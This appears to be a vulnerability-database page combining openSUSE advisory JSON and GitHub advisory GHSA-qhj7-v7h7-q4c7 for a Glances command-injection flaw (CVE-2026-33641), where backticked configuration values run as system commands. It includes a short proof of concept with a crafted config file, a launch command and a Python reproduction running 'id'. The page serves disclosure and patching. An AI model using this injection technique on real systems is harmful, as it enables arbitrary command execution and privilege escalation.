          "openSUSE Tumbleweed:python311-Glances-4.5.3-1.1.s390x",
          "openSUSE Tumbleweed:python311-Glances-4.5.3-1.1.x86_64",
          "openSUSE Tumbleweed:python313-Glances-4.5.3-1.1.aarch64",
          "openSUSE Tumbleweed:python313-Glances-4.5.3-1.1.ppc64le",
          "openSUSE Tumbleweed:python313-Glances-4.5.3-1.1.s390x",
          "openSUSE Tumbleweed:python313-Glances-4.5.3-1.1.x86_64",
          "openSUSE Tumbleweed:python314-Glances-4.5.3-1.1.aarch64",
          "openSUSE Tumbleweed:python314-Glances-4.5.3-1.1.ppc64le",
          "openSUSE Tumbleweed:python314-Glances-4.5.3-1.1.s390x",
          "openSUSE Tumbleweed:python314-Glances-4.5.3-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2026-33533",
          "url": "https://www.suse.com/security/cve/CVE-2026-33533"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1261379 for CVE-2026-33533",
          "url": "https://bugzilla.suse.com/1261379"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:glances-common-4.5.3-1.1.aarch64",
            "openSUSE Tumbleweed:glances-common-4.5.3-1.1.ppc64le",
            "openSUSE Tumbleweed:glances-common-4.5.3-1.1.s390x",
            "openSUSE Tumbleweed:glances-common-4.5.3-1.1.x86_64",
            "openSUSE Tumbleweed:python311-Glances-4.5.3-1.1.aarch64",
            "openSUSE Tumbleweed:python311-Glances-4.5.3-1.1.ppc64le",
            "openSUSE Tumbleweed:python311-Glances-4.5.3-1.1.s390x",
            "openSUSE Tumbleweed:python311-Glances-4.5.3-1.1.x86_64",
            "openSUSE Tumbleweed:python313-Glances-4.5.3-1.1.aarch64",
            "openSUSE Tumbleweed:python313-Glances-4.5.3-1.1.ppc64le",
            "openSUSE Tumbleweed:python313-Glances-4.5.3-1.1.s390x",
            "openSUSE Tumbleweed:python313-Glances-4.5.3-1.1.x86_64",
            "openSUSE Tumbleweed:python314-Glances-4.5.3-1.1.aarch64",
            "openSUSE Tumbleweed:python314-Glances-4.5.3-1.1.ppc64le",
            "openSUSE Tumbleweed:python314-Glances-4.5.3-1.1.s390x",
            "openSUSE Tumbleweed:python314-Glances-4.5.3-1.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          "products": [
            "openSUSE Tumbleweed:glances-common-4.5.3-1.1.aarch64",
            "openSUSE Tumbleweed:glances-common-4.5.3-1.1.ppc64le",
            "openSUSE Tumbleweed:glances-common-4.5.3-1.1.s390x",
            "openSUSE Tumbleweed:glances-common-4.5.3-1.1.x86_64",
            "openSUSE Tumbleweed:python311-Glances-4.5.3-1.1.aarch64",
            "openSUSE Tumbleweed:python311-Glances-4.5.3-1.1.ppc64le",
            "openSUSE Tumbleweed:python311-Glances-4.5.3-1.1.s390x",
            "openSUSE Tumbleweed:python311-Glances-4.5.3-1.1.x86_64",
            "openSUSE Tumbleweed:python313-Glances-4.5.3-1.1.aarch64",
            "openSUSE Tumbleweed:python313-Glances-4.5.3-1.1.ppc64le",
            "openSUSE Tumbleweed:python313-Glances-4.5.3-1.1.s390x",
            "openSUSE Tumbleweed:python313-Glances-4.5.3-1.1.x86_64",
            "openSUSE Tumbleweed:python314-Glances-4.5.3-1.1.aarch64",
            "openSUSE Tumbleweed:python314-Glances-4.5.3-1.1.ppc64le",
            "openSUSE Tumbleweed:python314-Glances-4.5.3-1.1.s390x",
            "openSUSE Tumbleweed:python314-Glances-4.5.3-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2026-04-09T00:00:00Z",
          "details": "moderate"
        }
      ],
      "title": "CVE-2026-33533"
    },
    {
      "cve": "CVE-2026-33641",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2026-33641"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.3, Glances supports dynamic configuration values in which substrings enclosed in backticks are executed as system commands during configuration parsing. This behavior occurs in Config.get_value() and is implemented without validation or restriction of the executed commands. If an attacker can modify or influence configuration files, arbitrary commands will execute automatically with the privileges of the Glances process during startup or configuration reload. In deployments where Glances runs with elevated privileges (e.g., as a system service), this may lead to privilege escalation. This issue has been patched in version 4.5.3.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:glances-common-4.5.3-1.1.aarch64",
          "openSUSE Tumbleweed:glances-common-4.5.3-1.1.ppc64le",
          "openSUSE Tumbleweed:glances-common-4.5.3-1.1.s390x",
          "openSUSE Tumbleweed:glances-common-4.5.3-1.1.x86_64",
          "openSUSE Tumbleweed:python311-Glances-4.5.3-1.1.aarch64",
          "openSUSE Tumbleweed:python311-Glances-4.5.3-1.1.ppc64le",
          "openSUSE Tumbleweed:python311-Glances-4.5.3-1.1.s390x",
          "openSUSE Tumbleweed:python311-Glances-4.5.3-1.1.x86_64",
          "openSUSE Tumbleweed:python313-Glances-4.5.3-1.1.aarch64",
          "openSUSE Tumbleweed:python313-Glances-4.5.3-1.1.ppc64le",
          "openSUSE Tumbleweed:python313-Glances-4.5.3-1.1.s390x",
          "openSUSE Tumbleweed:python313-Glances-4.5.3-1.1.x86_64",
          "openSUSE Tumbleweed:python314-Glances-4.5.3-1.1.aarch64",
          "openSUSE Tumbleweed:python314-Glances-4.5.3-1.1.ppc64le",
          "openSUSE Tumbleweed:python314-Glances-4.5.3-1.1.s390x",
          "openSUSE Tumbleweed:python314-Glances-4.5.3-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2026-33641",
          "url": "https://www.suse.com/security/cve/CVE-2026-33641"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1261380 for CVE-2026-33641",
          "url": "https://bugzilla.suse.com/1261380"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:glances-common-4.5.3-1.1.aarch64",
            "openSUSE Tumbleweed:glances-common-4.5.3-1.1.ppc64le",
            "openSUSE Tumbleweed:glances-common-4.5.3-1.1.s390x",
            "openSUSE Tumbleweed:glances-common-4.5.3-1.1.x86_64",
            "openSUSE Tumbleweed:python311-Glances-4.5.3-1.1.aarch64",
            "openSUSE Tumbleweed:python311-Glances-4.5.3-1.1.ppc64le",
            "openSUSE Tumbleweed:python311-Glances-4.5.3-1.1.s390x",
            "openSUSE Tumbleweed:python311-Glances-4.5.3-1.1.x86_64",
            "openSUSE Tumbleweed:python313-Glances-4.5.3-1.1.aarch64",
            "openSUSE Tumbleweed:python313-Glances-4.5.3-1.1.ppc64le",
            "openSUSE Tumbleweed:python313-Glances-4.5.3-1.1.s390x",
            "openSUSE Tumbleweed:python313-Glances-4.5.3-1.1.x86_64",
            "openSUSE Tumbleweed:python314-Glances-4.5.3-1.1.aarch64",
            "openSUSE Tumbleweed:python314-Glances-4.5.3-1.1.ppc64le",
            "openSUSE Tumbleweed:python314-Glances-4.5.3-1.1.s390x",
            "openSUSE Tumbleweed:python314-Glances-4.5.3-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2026-04-09T00:00:00Z",
          "details": "important"
        }
      ],
      "title": "CVE-2026-33641"
    }
  ]
}

GHSA-QHJ7-V7H7-Q4C7

Vulnerability from github – Published: 2026-03-30 17:01 – Updated: 2026-04-06 17:18

Summary

Glances Vulnerable to Command Injection via Dynamic Configuration Values

Details

Summary

Glances supports dynamic configuration values in which substrings enclosed in backticks are executed as system commands during configuration parsing. This behavior occurs in Config.get_value() and is implemented without validation or restriction of the executed commands.

If an attacker can modify or influence configuration files, arbitrary commands will execute automatically with the privileges of the Glances process during startup or configuration reload. In deployments where Glances runs with elevated privileges (e.g., as a system service), this may lead to privilege escalation.

Details

Glances loads configuration files from user, system, or custom paths during initialization.
When retrieving a configuration value, Config.get_value() scans for substrings enclosed in backticks.

File: glances/config.py

match = self.re_pattern.findall(ret)
for m in match:
    ret = ret.replace(m, system_exec(m[1:-1]))

The extracted string is passed directly to system_exec().

File: glances/globals.py

res = subprocess.run(command.split(' '), stdout=subprocess.PIPE).stdout.decode('utf-8')

The command is executed and its output replaces the original configuration value.

This execution occurs automatically whenever the configuration value is read.

Affected Files

glances/config.py — dynamic configuration parsing

glances/globals.py — command execution helper

Proof of Concept (PoC)

Scenario: Arbitrary command execution via configuration value

Step 1 — Create malicious configuration file

/tmp/glances.conf

add below txt on the file

[outputs]
url_prefix = 'id'

Step 2 — Launch Glances with custom configuration

glances -C /tmp/glances.conf

Step 3 — Observe behavior

When Glances reads the configuration:

The command inside backticks is executed
Output replaces the configuration value
Execution occurs without user interaction

Reproduce using Python code

import subprocess
import re

def system_exec(command):
    return subprocess.run(command.split(' '), stdout=subprocess.PIPE).stdout.decode().strip()

value = "`id`"
pattern = re.compile(r'(`.+?`)')

for m in pattern.findall(value):
    print(system_exec(m[1:-1]))

Output:

uid=1000(user) gid=1000(user) groups=1000(user)

Impact

Arbitrary Command Execution

Any command enclosed in backticks inside a configuration value will execute with the privileges of the Glances process.

Potential Privilege Escalation

If Glances runs as a privileged service (e.g., root), commands execute with those privileges.

Possible scenarios include:

Misconfigured file permissions allowing unauthorized config modification
Shared systems where configuration directories are writable by multiple users
Container environments with mounted configuration volumes
Automated configuration management systems that ingest untrusted data

Severity ?

7.8 (High)


                  
                    CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "Glances"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "4.5.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33641"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-30T17:01:27Z",
    "nvd_published_at": "2026-04-02T15:16:40Z",
    "severity": "HIGH"
  },
  "details": "## Summary\nGlances supports dynamic configuration values in which substrings enclosed in backticks are executed as system commands during configuration parsing. This behavior occurs in Config.get_value() and is implemented without validation or restriction of the executed commands.\n\nIf an attacker can modify or influence configuration files, arbitrary commands will execute automatically with the privileges of the Glances process during startup or configuration reload. In deployments where Glances runs with elevated privileges (e.g., as a system service), this may lead to privilege escalation.\n\n## Details\n\n1. Glances loads configuration files from user, system, or custom paths during initialization.\n2. When retrieving a configuration value, Config.get_value() scans for substrings enclosed in backticks.\n\n   **File: glances/config.py**\n  \n```\nmatch = self.re_pattern.findall(ret)\nfor m in match:\n    ret = ret.replace(m, system_exec(m[1:-1]))\n```\n\n\n3. The extracted string is passed directly to system_exec().\n\n   **File: glances/globals.py**\n   \n   \n```sh\nres = subprocess.run(command.split(\u0027 \u0027), stdout=subprocess.PIPE).stdout.decode(\u0027utf-8\u0027)\n```\n\n4. The command is executed and its output replaces the original configuration value.\n\nThis execution occurs automatically whenever the configuration value is read.\n\n### Affected Files\n\n   glances/config.py \u2014 dynamic configuration parsing\n\n   glances/globals.py \u2014 command execution helper\n\n## Proof of Concept (PoC)\n\nScenario: Arbitrary command execution via configuration value\n\n**Step 1 \u2014 Create malicious configuration file**\n\n```sh\n/tmp/glances.conf\n```\n\nadd below txt on the file\n\n```\n[outputs]\nurl_prefix = \u0027id\u0027\n```\n\n**Step 2 \u2014 Launch Glances with custom configuration**\n\n```sh\nglances -C /tmp/glances.conf\n```\n\n**Step 3 \u2014 Observe behavior**\n\nWhen Glances reads the configuration:\n\n  - The command inside backticks is executed\n  - Output replaces the configuration value\n  - Execution occurs without user interaction\n  \n  \n  Reproduce using  Python code\n  \n  \n```\nimport subprocess\nimport re\n\ndef system_exec(command):\n    return subprocess.run(command.split(\u0027 \u0027), stdout=subprocess.PIPE).stdout.decode().strip()\n\nvalue = \"`id`\"\npattern = re.compile(r\u0027(`.+?`)\u0027)\n\nfor m in pattern.findall(value):\n    print(system_exec(m[1:-1]))\n```\n\n**Output:**\n\n\n`uid=1000(user) gid=1000(user) groups=1000(user)`\n\n## Impact\n\n### Arbitrary Command Execution\n\nAny command enclosed in backticks inside a configuration value will execute with the privileges of the Glances process.\n\n### Potential Privilege Escalation\n\nIf Glances runs as a privileged service (e.g., root), commands execute with those privileges.\n\nPossible scenarios include:\n\n-   Misconfigured file permissions allowing unauthorized config modification\n-   Shared systems where configuration directories are writable by multiple users\n-   Container environments with mounted configuration volumes\n-   Automated configuration management systems that ingest untrusted data",
  "id": "GHSA-qhj7-v7h7-q4c7",
  "modified": "2026-04-06T17:18:29Z",
  "published": "2026-03-30T17:01:27Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nicolargo/glances/security/advisories/GHSA-qhj7-v7h7-q4c7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33641"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nicolargo/glances/commit/358d76a225fc21a9f95d2c4d7e46fafe64a644c6"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nicolargo/glances"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nicolargo/glances/releases/tag/v4.5.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Glances Vulnerable to Command Injection via Dynamic Configuration Values"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33641 (GCVE-0-2026-33641)

FKIE_CVE-2026-33641

OPENSUSE-SU-2026:10519-1

GHSA-QHJ7-V7H7-Q4C7

Summary

Details

Affected Files

Proof of Concept (PoC)

Impact

Arbitrary Command Execution

Potential Privilege Escalation

Tags

Sightings

Nomenclature